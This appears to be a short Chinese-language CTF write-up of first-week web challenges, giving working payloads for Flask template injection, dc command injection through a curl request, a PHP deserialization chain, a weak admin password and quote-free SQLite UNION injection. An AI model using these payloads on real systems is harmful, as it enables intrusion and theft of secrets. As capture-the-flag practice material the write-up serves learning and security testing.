做不過來了,就跟著做了一點
第一週
#### ez_ssti
from flask import Flask, request, render_template, render_template_string
import os
app = Flask(__name__)
flag=os.getenv("flag")
os.unsetenv("flag")
@app.route('/')
def index():
return open(__file__, "r").read()
@app.errorhandler(404)
def page_not_found(e):
print(request.root_url)
return render_template_string("The Url {} You Requested Can Not Found".format(request.url))
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8000)
直接在url後面新增
{{ config.__class__.__init__.__globals__['os'].environ['flag'] }}
即可
ez_rce
from flask import Flask, request
import subprocess
app = Flask(__name__)
@app.route("/")
def index():
return open(__file__).read()
@app.route("/calc", methods=['POST'])
def calculator():
expression = request.form.get('expression') or "114 1000 * 514 + p"
result = subprocess.run(["dc", "-e", expression], capture_output=True, text=True)
return result.stdout
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8000)
直接rce
curl -X POST http://47.76.152.109:60081//calc -d "expression=1 2 + !env"
hello_web
簽到
hello_http
http題目
ez_unser
php反序列化
<?php
highlight_file(__FILE__);
class Man{
private $name="原神,啟動";
public function __wakeup()
{
echo str_split($this->name);
}
}
class What{
private $Kun="兩年半";
public function __toString()
{
echo $this->Kun->hobby;
return "Ok";
}
}
class Can{
private $Hobby="唱跳rap籃球";
public function __get($name)
{
var_dump($this->Hobby);
}
}
class I{
private $name="Kobe";
public function __debugInfo()
{
$this->name->say();
}
}
class Say{
private $evil;
public function __call($name, $arguments)
{
$this->evil->Evil();
}
}
class Mamba{
public function Evil()
{
$filename=time().".log";
file_put_contents($filename,$_POST["content"]);
echo $filename;
}
}
class Out{
public function __call($name,$arguments)
{
$o = "./".str_replace("..", "第五人格",$_POST["o"]);
$n = $_POST["n"];
rename($o,$n);
}
}
unserialize($_POST["data"]);
鏈子從上往下就行,先寫個檔案,然後去改名.exp如下.
<?php
highlight_file(__FILE__);
class Man{
private $name;
public function setname($name){
$this->name = $name;
}
}
class What{
private $Kun;
public function setKun($Kun){
$this->Kun = $Kun;
}
}
class Can{
private $Hobby;
public function setHobby($Hobby){
$this->Hobby = $Hobby;
}
}
class I{
private $name;
public function setname($name){
$this->name = $name;
}
}
class Say{
private $evil;
public function setevil($evil){
$this->evil = $evil;
}
}
class Mamba{
}
class Out{
}
$a = new Man();
$b = new What();
$c = new Can();
$d = new I();
$e = new Say();
$f = new Mamba();
//$f = new Out();
$e->setevil($f);
$d->setname($e);
$c->setHobby($d);
$b->setKun($c);
$a->setname($b);
echo serialize($a);
ez_login
弱密碼,admin/admin123
ez_sql
sqlite注入有黑名單,扔個fuzz看看,發現單雙引號被槍斃了.
沒有單雙引號,可以使用char()去拼湊字串.數字注入不用擔心閉合.
用order by判斷了列數為5(雖然直接看也像是5),然後構造payload.
UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM sqlite_master WHERE type=char(116,97,98,108,101)--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM pragma_table_info(char(102,108,97,103))--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(flag) FROM flag--